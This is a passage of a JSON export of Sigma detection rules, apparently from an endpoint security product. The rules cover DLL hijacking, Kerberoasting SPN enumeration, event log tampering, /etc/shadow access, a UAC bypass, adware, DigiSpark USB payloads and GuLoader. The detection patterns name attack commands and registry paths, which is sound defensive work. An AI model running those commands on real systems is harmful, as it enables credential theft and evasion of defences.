"https://www.gov.pl/web/baza-wiedzy/espionage-campaign-linked-to-russian-intelligence-services",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_acrobat.yml",
"content": "title: DLL Hijacking via Acrobat.exe\nid: 7011ac8f-bfbe-4598-b846-eef8d866ebc7\ndescription: |\n Detects potential Windows DLL Hijacking via Acrobat.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by putting a legitimate Acrobat executable alongside a malicious winhttp.dll in RAR or ZIP packages.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://blogs.blackberry.com/en/2023/03/nobelium-targets-eu-governments-assisting-ukraine\n - https://www.gov.pl/web/baza-wiedzy/espionage-campaign-linked-to-russian-intelligence-services\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2023/11/17\nmodified: 2025/10/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'Acrobat.exe'\n ProcessSignature: 'Adobe Inc.'\n ImageLoaded|endswith:\n - '\\WINHTTP.dll'\n - '\\WININET.dll'\n - '\\vcruntime140.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\'\n - '?:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\'\n - '?:\\Program Files\\Adobe\\Reader\\'\n - '?:\\Program Files (x86)\\Adobe\\Reader\\'\n - '?:\\Program Files\\Adobe\\Acrobat *\\Acrobat\\'\n - '?:\\Program Files (x86)\\Adobe\\Acrobat *\\Acrobat\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n - '\\Device\\\\*\\Windows\\System32\\'\n - '\\Device\\\\*\\Windows\\SysWOW64\\'\n - '\\Device\\\\*\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n - 'Microsoft Windows Software Compatibility Publisher'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7011ac8f-bfbe-4598-b846-eef8d866ebc7",
"rule_name": "DLL Hijacking via Acrobat.exe",
"rule_description": "Detects potential Windows DLL Hijacking via Acrobat.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by putting a legitimate Acrobat executable alongside a malicious winhttp.dll in RAR or ZIP packages.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2023-11-17",
"rule_modified_date": "2025-10-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "706756d9-814a-4262-9f40-a8eccb5525a8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095440Z",
"creation_date": "2026-03-23T11:45:34.095442Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095447Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/_wald0/status/1562871258190348289",
"https://blog.certcube.com/kerberoasting-simplified-attack-and-defense/",
"https://attack.mitre.org/techniques/T1087/002/",
"https://attack.mitre.org/techniques/T1558/003/",
"https://attack.mitre.org/software/S0105/"
],
"name": "t1558_003_enumerate_spn_via_dsquery.yml",
"content": "title: Suspicious SPNs Enumeration via Dsquery\nid: 706756d9-814a-4262-9f40-a8eccb5525a8\ndescription: |\n Detects a suspicious Service Principal Names (SPNs) enumeration with dsquery.\n Attackers can extract the Service Principal Names (SPNs) used in Active Directory to conduct attacks such as Kerberoasting.\n Service Principal Names are used to uniquely identify each instance of a Windows service.\n Dsquery is a Windows legitimate binary that can be used to query Active Directory for gathering information.\n It is recommended to check the parent processes for other suspicious activities.\nreferences:\n - https://twitter.com/_wald0/status/1562871258190348289\n - https://blog.certcube.com/kerberoasting-simplified-attack-and-defense/\n - https://attack.mitre.org/techniques/T1087/002/\n - https://attack.mitre.org/techniques/T1558/003/\n - https://attack.mitre.org/software/S0105/\ndate: 2022/08/26\nmodified: 2025/02/13\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087.002\n - attack.credential_access\n - attack.t1558.003\n - attack.s0105\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\n - classification.Windows.Behavior.ActiveDirectory\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_dsquery:\n OriginalFileName: 'dsquery.exe'\n\n # dsquery * -filter \"(&(objectcategory=computer) (servicePrincipalName=*))\" -attr distinguishedName servicePrincipalName\n selection_filter:\n CommandLine|contains:\n - ' -filter '\n - ' /filter '\n\n selection_spn:\n CommandLine|contains|all:\n - 'objectCategory'\n - 'servicePrincipalName'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "706756d9-814a-4262-9f40-a8eccb5525a8",
"rule_name": "Suspicious SPNs Enumeration via Dsquery",
"rule_description": "Detects a suspicious Service Principal Names (SPNs) enumeration with dsquery.\nAttackers can extract the Service Principal Names (SPNs) used in Active Directory to conduct attacks such as Kerberoasting.\nService Principal Names are used to uniquely identify each instance of a Windows service.\nDsquery is a Windows legitimate binary that can be used to query Active Directory for gathering information.\nIt is recommended to check the parent processes for other suspicious activities.\n",
"rule_creation_date": "2022-08-26",
"rule_modified_date": "2025-02-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1087.002",
"attack.t1558.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "706e1b12-c234-4940-a0c9-11a371bfc4c2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073179Z",
"creation_date": "2026-03-23T11:45:34.073181Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073185Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://micahbabinski.medium.com/catching-a-wev-tutil-threat-detection-for-the-rest-of-us-f692f01efcd4",
"https://blog.talosintelligence.com/from-blackmatter-to-blackcat-analyzing/",
"https://attack.mitre.org/techniques/T1562/002/"
],
"name": "t1562_002_disable_windows_eventlog.yml",
"content": "title: Suspicious Windows Event Logs Manipulation via wevtutil\nid: 706e1b12-c234-4940-a0c9-11a371bfc4c2\ndescription: |\n Detects when one of the Windows Event Logs is disabled or if its size is reduced.\n This technique is sometimes used by attackers to hide their malicious activities.\n It is recommended to investigate the process responsible for the execution of wevutil and to look for other suspicious actions on the host.\n If this activity is legitimate and recurrent in your environment, it is recommended to whitelist the processes or scrips responsible for this activity.\nreferences:\n - https://micahbabinski.medium.com/catching-a-wev-tutil-threat-detection-for-the-rest-of-us-f692f01efcd4\n - https://blog.talosintelligence.com/from-blackmatter-to-blackcat-analyzing/\n - https://attack.mitre.org/techniques/T1562/002/\ndate: 2022/12/15\nmodified: 2025/01/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\wevtutil.exe'\n - OriginalFileName: 'wevtutil.exe'\n\n selection_action:\n CommandLine|contains:\n - ' set-log '\n - ' sl '\n\n selection_args:\n CommandLine|contains:\n - '?e:false' # Disabling\n - '?enabled:false' # Disabling\n - '?ms:' # Size reduction\n\n condition: all of selection_*\nlevel: medium\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "706e1b12-c234-4940-a0c9-11a371bfc4c2",
"rule_name": "Suspicious Windows Event Logs Manipulation via wevtutil",
"rule_description": "Detects when one of the Windows Event Logs is disabled or if its size is reduced.\nThis technique is sometimes used by attackers to hide their malicious activities.\nIt is recommended to investigate the process responsible for the execution of wevutil and to look for other suspicious actions on the host.\nIf this activity is legitimate and recurrent in your environment, it is recommended to whitelist the processes or scrips responsible for this activity.\n",
"rule_creation_date": "2022-12-15",
"rule_modified_date": "2025-01-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "70a2410f-7713-47f6-aebd-e7a300dd5add",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.294753Z",
"creation_date": "2026-03-23T11:45:35.294756Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294761Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md",
"https://attack.mitre.org/techniques/T1003/008/",
"https://attack.mitre.org/techniques/T1078/"
],
"name": "t1003_008_etc_shadow_accessed_cli.yml",
"content": "title: File /etc/shadow Accessed via Command-line\nid: 70a2410f-7713-47f6-aebd-e7a300dd5add\ndescription: |\n Detects a suspicious attempt to access /etc/shadow from the command-line.\n This file contains the encrypted passwords of all the accounts on the system.\n The content of this file is often used to gather information about the system and for offline password cracking.\n It is recommended to ensure that the process accessing this file is legitimate and that it will keep its content secret.\n If this activity comes from legitimate software in your environment and is recurrent, it is highly recommended to whitelist the offending processes.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md\n - https://attack.mitre.org/techniques/T1003/008/\n - https://attack.mitre.org/techniques/T1078/\ndate: 2021/09/14\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.008\n - attack.t1078\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine|contains: '/etc/shadow'\n Image|endswith:\n - '/cat'\n - '/less'\n - '/more'\n - '/vi'\n - '/vim.basic'\n - '/vim.tiny'\n - '/cp'\n - '/rsync'\n ParentImage|contains: '?'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '|/usr/sbin/cron|'\n - '|/usr/sbin/crond|'\n - '|/opt/bmc/bladelogic/RSCD/bin/rscd_full|'\n\n exclusion_debian_backup:\n CommandLine: 'cp -p /etc/shadow shadow.bak'\n CurrentDirectory:\n - '/var/backups'\n - '/var/backups/'\n ParentCommandLine: '/bin/sh /etc/cron.daily/passwd'\n\n exclusion_qualys:\n Ancestors|contains:\n - '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n - '/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent'\n\n exclusion_lynis:\n ParentCommandLine:\n - '/bin/sh ./lynis audit system'\n - '/bin/sh /usr/bin/lynis *'\n - '/bin/sh /usr/sbin/lynis *'\n - '/usr/bin/sh /usr/bin/lynis *'\n\n exclusion_osconfexec:\n ParentCommandLine:\n - '/bin/sh ./osconf.sh setpassword *'\n - './osconfexec -coredump'\n ProcessGrandparentCommandLine: './osconfexec -coredump'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "70a2410f-7713-47f6-aebd-e7a300dd5add",
"rule_name": "File /etc/shadow Accessed via Command-line",
"rule_description": "Detects a suspicious attempt to access /etc/shadow from the command-line.\nThis file contains the encrypted passwords of all the accounts on the system.\nThe content of this file is often used to gather information about the system and for offline password cracking.\nIt is recommended to ensure that the process accessing this file is legitimate and that it will keep its content secret.\nIf this activity comes from legitimate software in your environment and is recurrent, it is highly recommended to whitelist the offending processes.\n",
"rule_creation_date": "2021-09-14",
"rule_modified_date": "2026-02-11",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.008",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "70a8e0db-44d1-44c4-b3f2-c0f6491afcfa",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092927Z",
"creation_date": "2026-03-23T11:45:34.092929Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092933Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_prepare_uac_bypass_mscfile.yml",
"content": "title: Mcfile UAC Bypass Prepared\nid: 70a8e0db-44d1-44c4-b3f2-c0f6491afcfa\ndescription: |\n Detects the preparation of the mscfile UAC bypass, involving the setting of multiple registry keys.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the process and user session responsible for the registry edit to look for malicious content or actions.\nreferences:\n - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2020/09/25\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - attack.t1112\n - attack.t1546.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_set_value:\n EventType: 'SetValue'\n TargetObject:\n - 'HKU\\\\*\\mscfile\\shell\\open\\command\\(Default)'\n - 'HKU\\\\*\\mscfile\\\\*SymbolicLinkValue'\n\n filter_empty:\n Details: '(Empty)'\n\n selection_rename:\n EventType:\n - 'RenameValue'\n - 'RenameKey'\n NewName: 'HKU\\\\*_Classes\\mscfile\\\\*'\n\n condition: (selection_set_value and not filter_empty) or selection_rename\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "70a8e0db-44d1-44c4-b3f2-c0f6491afcfa",
"rule_name": "Mcfile UAC Bypass Prepared",
"rule_description": "Detects the preparation of the mscfile UAC bypass, involving the setting of multiple registry keys.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the process and user session responsible for the registry edit to look for malicious content or actions.\n",
"rule_creation_date": "2020-09-25",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1546.001",
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "70ca224f-c417-4d4e-8b9e-bb8645c6218e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611409Z",
"creation_date": "2026-03-23T11:45:34.611412Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.611420Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.partitionwizard.com/partitionmanager/what-is-premieropinion-on-my-computer.html",
"https://attack.mitre.org/techniques/T1119/"
],
"name": "t1119_premier_opinion_adware.yml",
"content": "title: Premier Opinion AdWare RunDLL32 Execution\nid: 70ca224f-c417-4d4e-8b9e-bb8645c6218e\ndescription: |\n Detects the execution of Premier Opinion's DLL through RunDLL32.\n Premier Opinion is an adware that collects and sells internet usage data.\n It is recommended to cleanup this DLL file and investigate the calling process for traces of persistence.\nreferences:\n - https://www.partitionwizard.com/partitionmanager/what-is-premieropinion-on-my-computer.html\n - https://attack.mitre.org/techniques/T1119/\ndate: 2023/06/15\nmodified: 2025/03/07\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1119\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Adware.PremierOpinion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n OriginalFileName: 'RUNDLL32.EXE'\n CommandLine|contains: ' pmls64.dll,RunProcWithDll '\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "70ca224f-c417-4d4e-8b9e-bb8645c6218e",
"rule_name": "Premier Opinion AdWare RunDLL32 Execution",
"rule_description": "Detects the execution of Premier Opinion's DLL through RunDLL32.\nPremier Opinion is an adware that collects and sells internet usage data.\nIt is recommended to cleanup this DLL file and investigate the calling process for traces of persistence.\n",
"rule_creation_date": "2023-06-15",
"rule_modified_date": "2025-03-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1119"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "70f273a7-a783-4f80-b090-c40092c56e80",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091843Z",
"creation_date": "2026-03-23T11:45:34.091845Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091849Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redacted.au/creating-a-usb-rubber-ducky-from-a-digispark-attiny-85/",
"https://github.com/zer0overflow/DigiPwn",
"https://attack.mitre.org/techniques/T1091/",
"https://attack.mitre.org/techniques/T1200/"
],
"name": "t1200_popular_digispark_commands.yml",
"content": "title: DigiSpark USB Malicious Commands\nid: 70f273a7-a783-4f80-b090-c40092c56e80\ndescription: |\n Detects popular default commands and processes used by DigiSpark, an alternative to USB hacking tools like RubberDucky or BashBunny.\n This detects snippets from different public repositories associated with DigiSpark. While some actions may not be from a DigiSpark device, they may still be malicious.\n It is recommended to investigate the PowerShell script and determine the context in which it was executed. It is also recommended to investigate any USB devices that were plugged in to this machine.\nreferences:\n - https://redacted.au/creating-a-usb-rubber-ducky-from-a-digispark-attiny-85/\n - https://github.com/zer0overflow/DigiPwn\n - https://attack.mitre.org/techniques/T1091/\n - https://attack.mitre.org/techniques/T1200/\ndate: 2025/01/06\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1200\n - attack.t1091\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.DigiSpark\n - classification.Windows.Behavior.USB\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n CommandLine|contains:\n - 'start C:/Windows/System32/Ribbons.scr /s'\n - 'copy con tmp.cmd'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "70f273a7-a783-4f80-b090-c40092c56e80",
"rule_name": "DigiSpark USB Malicious Commands",
"rule_description": "Detects popular default commands and processes used by DigiSpark, an alternative to USB hacking tools like RubberDucky or BashBunny.\nThis detects snippets from different public repositories associated with DigiSpark. While some actions may not be from a DigiSpark device, they may still be malicious.\nIt is recommended to investigate the PowerShell script and determine the context in which it was executed. It is also recommended to investigate any USB devices that were plugged in to this machine.\n",
"rule_creation_date": "2025-01-06",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1091",
"attack.t1200"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "71194d01-ab1d-4958-a874-28f60815affe",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.604355Z",
"creation_date": "2026-03-23T11:45:34.604358Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.604365Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://research.checkpoint.com/2023/cloud-based-malware-delivery-the-evolution-of-guloader/",
"https://www.intrinsec.com/wp-content/uploads/2023/09/TLP-CLEAR-20230912-EN-GuLoader-Information-report.pdf",
"https://attack.mitre.org/software/S0561/"
],
"name": "t1059_001_guloader_powershell.yml",
"content": "title: PowerShell Command-line Related to GuLoader\nid: 71194d01-ab1d-4958-a874-28f60815affe\ndescription: |\n Detects suspicious PowerShell command-line arguments used by the VBS variants of GuLoader.\n GuLoader is an advanced malware downloader that uses a polymorphic shellcode loader to dodge traditional security solutions.\n This particular rule is geared towards the early infection chain, detecting when an user runs GuLoader's malicious VBS script used for an initial foothold.\n It is recommended to investigate the Powershell script to determine its legitimacy and see if it matches with the GuLoader pattern.\nreferences:\n - https://research.checkpoint.com/2023/cloud-based-malware-delivery-the-evolution-of-guloader/\n - https://www.intrinsec.com/wp-content/uploads/2023/09/TLP-CLEAR-20230912-EN-GuLoader-Information-report.pdf\n - https://attack.mitre.org/software/S0561/\ndate: 2023/12/15\nmodified: 2025/03/12\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.t1204.002\n - attack.s0561\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Loader.GuLoader\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ParentImage|endswith: '\\Wscript.exe'\n Image|endswith: '\\Powershell.exe'\n # Function heftestra9 ([String]$Mordr13 )\n # Function Lomtama ([String]$Hellig)\n # Function undervisni9 ( [String]$Plynlymm )\n CommandLine|re: 'powershell\\.exe Function \\w{3,12} *?\\( *?\\[String\\] *?\\$\\w{3,12} *?\\)'\n\n condition: selection\nlevel: high\n# level: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "71194d01-ab1d-4958-a874-28f60815affe",
"rule_name": "PowerShell Command-line Related to GuLoader",
"rule_description": "Detects suspicious PowerShell command-line arguments used by the VBS variants of GuLoader.\nGuLoader is an advanced malware downloader that uses a polymorphic shellcode loader to dodge traditional security solutions.\nThis particular rule is geared towards the early infection chain, detecting when an user runs GuLoader's malicious VBS script used for an initial foothold.\nIt is recommended to investigate the Powershell script to determine its legitimacy and see if it matches with the GuLoader pattern.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2025-03-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1204.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "71223ef6-7b62-4e8e-8457-634d94aea022",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625291Z",
"creation_date": "2026-03-23T11:45:34.625293Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625297Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/",
"https://twitter.com/embee_research/status/1623908375242350593",
